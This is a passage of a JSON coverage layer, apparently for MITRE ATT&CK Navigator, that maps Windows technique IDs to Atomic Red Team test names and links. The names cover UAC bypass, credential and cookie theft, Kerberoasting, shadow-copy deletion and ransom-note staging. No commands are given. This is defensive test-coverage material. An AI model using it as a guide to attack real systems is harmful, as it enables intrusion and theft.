Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":2,"enabled":true,"comment":"\n- CMSTP Executing Remote Scriptlet\n- CMSTP Executing UAC Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":8,"enabled":true,"comment":"\n- CheckIfInstallable method call\n- InstallHelper method call\n- InstallUtil class constructor method call\n- InstallUtil Install method call\n- InstallUtil Uninstall method call - /U variant\n- InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant\n- InstallUtil HelpText method call\n- InstallUtil evasive invocation\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":10,"enabled":true,"comment":"\n- Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject\n- Mshta executes VBScript to execute malicious command\n- Mshta Executes Remote HTML Application (HTA)\n- Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement\n- Invoke HTML Application - Jscript Engine Simulating Double Click\n- Invoke HTML Application - Direct download from URI\n- Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler\n- Invoke HTML Application - JScript Engine with Inline Protocol Handler\n- Invoke HTML Application - Simulate Lateral Movement over UNC Path\n- Mshta used to Execute PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":11,"enabled":true,"comment":"\n- Msiexec.exe - Execute Local MSI file with embedded JScript\n- Msiexec.exe - Execute Local MSI file with embedded VBScript\n- Msiexec.exe - Execute Local MSI file with an embedded DLL\n- Msiexec.exe - Execute Local MSI file with an embedded EXE\n- WMI Win32_Product Class - Execute Local MSI file with embedded JScript\n- WMI Win32_Product Class - Execute Local MSI file with embedded VBScript\n- WMI Win32_Product Class - Execute Local MSI file with an embedded DLL\n- WMI Win32_Product Class - Execute Local MSI file with an embedded EXE\n- Msiexec.exe - Execute the DllRegisterServer function of a DLL\n- Msiexec.exe - Execute the DllUnregisterServer function of a DLL\n- Msiexec.exe - Execute Remote MSI file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":2,"enabled":true,"comment":"\n- Odbcconf.exe - Execute Arbitrary DLL\n- Odbcconf.exe - 
Load Response File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":2,"enabled":true,"comment":"\n- Regasm Uninstall Method Call Test\n- Regsvcs Uninstall Method Call Test\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":5,"enabled":true,"comment":"\n- Regsvr32 local COM scriptlet execution\n- Regsvr32 remote COM scriptlet execution\n- Regsvr32 local DLL execution\n- Regsvr32 Registering Non DLL\n- Regsvr32 Silent DLL Install Call DllRegisterServer\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":13,"enabled":true,"comment":"\n- Rundll32 execute JavaScript Remote Payload With GetObject\n- Rundll32 execute VBscript command\n- Rundll32 execute VBscript command using Ordinal number\n- Rundll32 advpack.dll Execution\n- Rundll32 ieadvpack.dll Execution\n- Rundll32 syssetup.dll Execution\n- Rundll32 setupapi.dll Execution\n- Execution of HTA and VBS Files using Rundll32 and URL.dll\n- Launches an executable using Rundll32 and pcwutl.dll\n- Execution of non-dll using rundll32.exe\n- Rundll32 with Ordinal Value\n- Rundll32 with Control_RunDLL\n- Rundll32 with desk.cpl\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1219","score":11,"enabled":true,"comment":"\n- TeamViewer Files Detected Test on Windows\n- AnyDesk Files Detected Test on Windows\n- LogMeIn Files Detected Test on Windows\n- GoToAssist Files Detected Test on Windows\n- ScreenConnect Application Download and Install on Windows\n- Ammyy Admin Software Execution\n- RemotePC Software Execution\n- NetSupport - RAT Execution\n- UltraViewer - RAT 
Execution\n- UltraVNC Execution\n- MSP360 Connect Execution\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":4,"enabled":true,"comment":"\n- MSXSL Bypass using local files\n- MSXSL Bypass using remote files\n- WMIC bypass using local XSL file\n- WMIC bypass using remote XSL file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":1,"enabled":true,"comment":"\n- WINWORD Remote Template Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.001","score":5,"enabled":true,"comment":"\n- Take ownership using takeown utility\n- cacls - Grant permission to specified user or group recursively\n- attrib - Remove read-only attribute\n- attrib - hide file\n- Grant Full Access to folder for Everyone - Ryuk Ransomware Style\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1482","score":8,"enabled":true,"comment":"\n- Windows - Discover domain trusts with dsquery\n- Windows - Discover domain trusts with nltest\n- Powershell enumerate domains and forests\n- Adfind - Enumerate Active Directory OUs\n- Adfind - Enumerate Active Directory Trusts\n- Get-DomainTrust with PowerView\n- Get-ForestTrust with PowerView\n- TruffleSnout - Listing AD Infrastructure\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.001","score":2,"enabled":true,"comment":"\n- LockBit Black - Modify Group policy settings -cmd\n- LockBit Black - Modify Group policy settings -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md"}]},{"techniqueID":"T1485","score":2,"enabled":true,"comment":"\n- Windows - Overwrite file with SysInternals SDelete\n- Overwrite deleted data on C drive\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":3,"enabled":true,"comment":"\n- PureLocker Ransom Note\n- Data Encrypted with GPG4Win\n- Data Encrypt Using DiskCryptor\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":3,"enabled":true,"comment":"\n- Windows - Stop service using Service Controller\n- Windows - Stop service using net.exe\n- Windows - Stop service by killing process\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":11,"enabled":true,"comment":"\n- Windows - Delete Volume Shadow Copies\n- Windows - Delete Volume Shadow Copies via WMI\n- Windows - wbadmin Delete Windows Backup Catalog\n- Windows - Disable Windows Recovery Console Repair\n- Windows - Delete Volume Shadow Copies via WMI with PowerShell\n- Windows - Delete Backup Files\n- Windows - wbadmin Delete systemstatebackup\n- Windows - Disable the SR scheduled task\n- Disable System Restore Through Registry\n- Windows - vssadmin Resize Shadowstorage Volume\n- Modify VSS Service Permissions\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491/T1491.md"}]},{"techniqueID":"T1491.001","score":2,"enabled":true,"comment":"\n- Replace Desktop Wallpaper\n- Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1497","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":2,"enabled":true,"comment":"\n- Detect Virtualization Environment (Windows)\n- Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505/T1505.md"}]},{"techniqueID":"T1505.002","score":1,"enabled":true,"comment":"\n- Install MS Exchange Transport Agent Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":1,"enabled":true,"comment":"\n- Web Shell Written to Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505.004","score":2,"enabled":true,"comment":"\n- Install IIS Module using AppCmd.exe\n- Install IIS Module using PowerShell Cmdlet New-WebGlobalModule\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.004/T1505.004.md"}]},{"techniqueID":"T1505.005","score":2,"enabled":true,"comment":"\n- Simulate Patching termsrv.dll\n- Modify Terminal Services DLL Path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.005/T1505.005.md"}]},{"techniqueID":"T1518","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}],"comment":"\n- Find and Display Internet Explorer Browser Version\n- Applications Installed\n- WinPwn - Dotnetsearch\n- WinPwn - DotNet\n- WinPwn - powerSQL\n"},{"techniqueID":"T1518.001","score":7,"enabled":true,"comment":"\n- Security Software Discovery\n- Security Software Discovery - powershell\n- Security Software Discovery - Sysmon Service\n- Security Software Discovery - AV Discovery via WMI\n- Security Software Discovery - AV Discovery via Get-CimInstance and Get-WmiObject cmdlets\n- Security Software Discovery - Windows Defender Enumeration\n- Security Software Discovery - Windows Firewall Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1529","score":3,"enabled":true,"comment":"\n- Shutdown System - Windows\n- Restart System - Windows\n- Logoff System - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":3,"enabled":true,"comment":"\n- Change User Password - Windows\n- Delete User - Windows\n- Remove Account From Domain Admin Group\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1539","score":2,"enabled":true,"comment":"\n- Steal Firefox Cookies (Windows)\n- Steal Chrome Cookies 
(Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1539/T1539.md"}]},{"techniqueID":"T1543","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.003","score":6,"enabled":true,"comment":"\n- Modify Fax service to run PowerShell\n- Service Installation CMD\n- Service Installation PowerShell\n- TinyTurla backdoor service w64time\n- Remote Service Installation CMD\n- Modify Service to Run Arbitrary Binary (Powershell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1546","score":27,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}],"comment":"\n- Persistence with Custom AutodialDLL\n- HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)\n- HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation)\n- WMI Invoke-CimMethod Start Process\n"},{"techniqueID":"T1546.001","score":1,"enabled":true,"comment":"\n- Change Default File Association\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":1,"enabled":true,"comment":"\n- Set Arbitrary Binary as Screensaver\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":3,"enabled":true,"comment":"\n- Persistence via WMI Event Subscription - CommandLineEventConsumer\n- Persistence via WMI Event Subscription - ActiveScriptEventConsumer\n- Windows MOFComp.exe Load MOF File\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.007","score":1,"enabled":true,"comment":"\n- Netsh Helper DLL Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":4,"enabled":true,"comment":"\n- Attaches Command Prompt as a Debugger to a List of Target Processes\n- Replace binary of sticky keys\n- Create Symbolic Link From osk.exe to cmd.exe\n- Atbroker.exe (AT) Executes Arbitrary Command via Registry Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.009","score":1,"enabled":true,"comment":"\n- Create registry persistence via AppCert DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.009/T1546.009.md"}]},{"techniqueID":"T1546.010","score":1,"enabled":true,"comment":"\n- Install AppInit Shim\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":3,"enabled":true,"comment":"\n- Application Shim Installation\n- New shim database files created in the default shim database directory\n- Registry key creation and/or modification events for SDB\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":3,"enabled":true,"comment":"\n- IFEO Add Debugger\n- IFEO Global Flags\n- GlobalFlags in Image File Execution Options\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":1,"enabled":true,"comment":"\n- Append malicious start-process 
cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.015","score":4,"enabled":true,"comment":"\n- COM Hijacking - InprocServer32\n- Powershell Execute COM Object\n- COM Hijacking with RunDLL32 (Local Server Switch)\n- COM hijacking via TreatAs\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547","score":38,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}],"comment":"\n- Add a driver\n"},{"techniqueID":"T1547.001","score":17,"enabled":true,"comment":"\n- Reg Key Run\n- Reg Key RunOnce\n- PowerShell Registry RunOnce\n- Suspicious vbs file run from startup Folder\n- Suspicious jse file run from startup Folder\n- Suspicious bat file run from startup Folder\n- Add Executable Shortcut Link to User Startup Folder\n- Add persistance via Recycle bin\n- SystemBC Malware-as-a-Service Registry\n- Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value\n- Change Startup Folder - HKCU Modify User Shell Folders Startup Value\n- HKCU - Policy Settings Explorer Run Key\n- HKLM - Policy Settings Explorer Run Key\n- HKLM - Append Command to Winlogon Userinit KEY Value\n- HKLM - Modify default System Shell - Winlogon Shell KEY Value \n- secedit used to create a Run key in the HKLM Hive\n- Modify BootExecute Value\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":1,"enabled":true,"comment":"\n- Authentication Package\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.003","score":2,"enabled":true,"comment":"\n- Create a new time provider\n- 
Edit an existing time provider\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.003/T1547.003.md"}]},{"techniqueID":"T1547.004","score":5,"enabled":true,"comment":"\n- Winlogon Shell Key Persistence - PowerShell\n- Winlogon Userinit Key Persistence - PowerShell\n- Winlogon Notify Key Logon Persistence - PowerShell\n- Winlogon HKLM Shell Key Persistence - PowerShell\n- Winlogon HKLM Userinit Key Persistence - PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":2,"enabled":true,"comment":"\n- Modify HKLM:\\System\\CurrentControlSet\\Control\\Lsa Security Support Provider configuration in registry\n- Modify HKLM:\\System\\CurrentControlSet\\Control\\Lsa\\OSConfig Security Support Provider configuration in registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":1,"enabled":true,"comment":"\n- Snake Malware Kernel Driver Comadmin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.008","score":1,"enabled":true,"comment":"\n- Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.008/T1547.008.md"}]},{"techniqueID":"T1547.009","score":2,"enabled":true,"comment":"\n- Shortcut Modification\n- Create shortcut to cmd in startup folders\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":1,"enabled":true,"comment":"\n- Add Port Monitor persistence in Registry\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.012","score":1,"enabled":true,"comment":"\n- Print Processors\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.012/T1547.012.md"}]},{"techniqueID":"T1547.014","score":3,"enabled":true,"comment":"\n- HKLM - Add atomic_test key to launch executable as part of user setup\n- HKLM - Add malicious StubPath value to existing Active Setup Entry\n- HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.014/T1547.014.md"}]},{"techniqueID":"T1547.015","score":1,"enabled":true,"comment":"\n- Persistence by modifying Windows Terminal profile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.002","score":26,"enabled":true,"comment":"\n- Bypass UAC using Event Viewer (cmd)\n- Bypass UAC using Event Viewer (PowerShell)\n- Bypass UAC using Fodhelper\n- Bypass UAC using Fodhelper - PowerShell\n- Bypass UAC using ComputerDefaults (PowerShell)\n- Bypass UAC by Mocking Trusted Directories\n- Bypass UAC using sdclt DelegateExecute\n- Disable UAC using reg.exe\n- Bypass UAC using SilentCleanup task\n- UACME Bypass Method 23\n- UACME Bypass Method 31\n- UACME Bypass Method 33\n- UACME Bypass Method 34\n- UACME Bypass Method 39\n- UACME Bypass Method 56\n- UACME Bypass Method 59\n- UACME Bypass Method 61\n- WinPwn - UAC Magic\n- WinPwn - UAC Bypass ccmstp technique\n- WinPwn - UAC Bypass DiskCleanup technique\n- WinPwn - UAC Bypass DccwBypassUAC technique\n- Disable 
UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key\n- UAC Bypass with WSReset Registry Modification\n- Disable UAC - Switch to the secure desktop when prompting for elevation via registry key\n- Disable UAC notification via registry keys\n- Disable ConsentPromptBehaviorAdmin via registry keys\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1550","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.002","score":3,"enabled":true,"comment":"\n- Mimikatz Pass the Hash\n- crackmapexec Pass the Hash\n- Invoke-WMIExec Pass the Hash\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":2,"enabled":true,"comment":"\n- Mimikatz Kerberos Ticket Attack\n- Rubeus Kerberos Pass The Ticket\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.001","score":8,"enabled":true,"comment":"\n- Extracting passwords with findstr\n- Access unattend.xml\n- WinPwn - sensitivefiles\n- WinPwn - Snaffler\n- WinPwn - powershellsensitive\n- WinPwn - passhunt\n- WinPwn - SessionGopher\n- WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":2,"enabled":true,"comment":"\n- Enumeration for Credentials in Registry\n- Enumeration for PuTTY Credentials in 
Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.004","score":7,"enabled":true,"comment":"\n- Private Keys\n- ADFS token signing and encryption certificates theft - Local\n- ADFS token signing and encryption certificates theft - Remote\n- CertUtil ExportPFX\n- Export Root Certificate with Export-PFXCertificate\n- Export Root Certificate with Export-Certificate\n- Export Certificates with Mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.006","score":2,"enabled":true,"comment":"\n- GPP Passwords (findstr)\n- GPP Passwords (Get-GPPPassword)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1553","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.003","score":1,"enabled":true,"comment":"\n- SIP (Subject Interface Package) Hijacking via Custom DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.003/T1553.003.md"}]},{"techniqueID":"T1553.004","score":3,"enabled":true,"comment":"\n- Install root CA on Windows\n- Install root CA on Windows with certutil\n- Add Root Certificate to CurrentUser Certificate Store\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":4,"enabled":true,"comment":"\n- Mount ISO image\n- Mount an ISO image and run executable from the ISO\n- Remove the Zone.Identifier alternate data stream\n- Execute LNK file from ISO\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}],"comment":"\n- Extract Windows Credential Manager via VBA\n- Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]\n- Dump credentials from Windows Credential Manager With PowerShell [web Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials]\n- WinPwn - Loot local Credentials - lazagne\n- WinPwn - Loot local Credentials - Wifi Credentials\n- WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords\n"},{"techniqueID":"T1555.003","score":14,"enabled":true,"comment":"\n- Run Chrome-password Collector\n- LaZagne - Credentials from Browser\n- Simulating access to Chrome Login Data\n- Simulating access to Opera Login Data\n- Simulating access to Windows Firefox Login Data\n- Simulating access to Windows Edge Login Data\n- Decrypt Mozilla Passwords with Firepwd.py\n- Stage Popular Credential Files for Exfiltration\n- WinPwn - BrowserPwn\n- WinPwn - Loot local Credentials - mimi-kittenz\n- WinPwn - PowerSharpPack - Sharpweb for Browser Credentials\n- WebBrowserPassView - Credentials from Browser\n- BrowserStealer (Chrome / Firefox / Microsoft Edge)\n- Dump Chrome Login Data with esentutl\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555.004","score":2,"enabled":true,"comment":"\n- Access Saved Credentials via VaultCmd\n- WinPwn - Loot local Credentials - Invoke-WCMDump\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.004/T1555.004.md"}]},{"techniqueID":"T1556","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.002","score":1,"enabled":true,"comment":"\n- Install and Register Password Filter DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"comment":"\n- LLMNR Poisoning with Inveigh (PowerShell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"comment":"\n- Crafting Active Directory golden tickets with mimikatz\n- Crafting Active Directory golden tickets with Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"comment":"\n- Crafting Active Directory silver tickets with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"comment":"\n- Request for service tickets\n- Rubeus kerberoast\n- Extract all accounts in use as SPN using setspn\n- Request A Single Ticket via PowerShell\n- Request All Tickets via PowerShell\n- WinPwn - Kerberoasting\n- WinPwn - PowerSharpPack - 
Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"comment":"\n- Rubeus asreproast\n- Get-DomainUser with PowerView\n- WinPwn - PowerSharpPack - Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}],"comment":"\n- Cobalt Strike Artifact Kit pipe\n- Cobalt Strike Lateral Movement (psexec_psh) pipe\n- Cobalt Strike SSH (postex_ssh) pipe\n- Cobalt Strike post-exploitation pipe (4.2 and later)\n- Cobalt Strike post-exploitation pipe (before 4.2)\n"},{"techniqueID":"T1559.002","score":3,"enabled":true,"comment":"\n- Execute Commands\n- Execute PowerShell script via Word DDE\n- DDEAUTO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":5,"enabled":true,"links":[{"label":"View 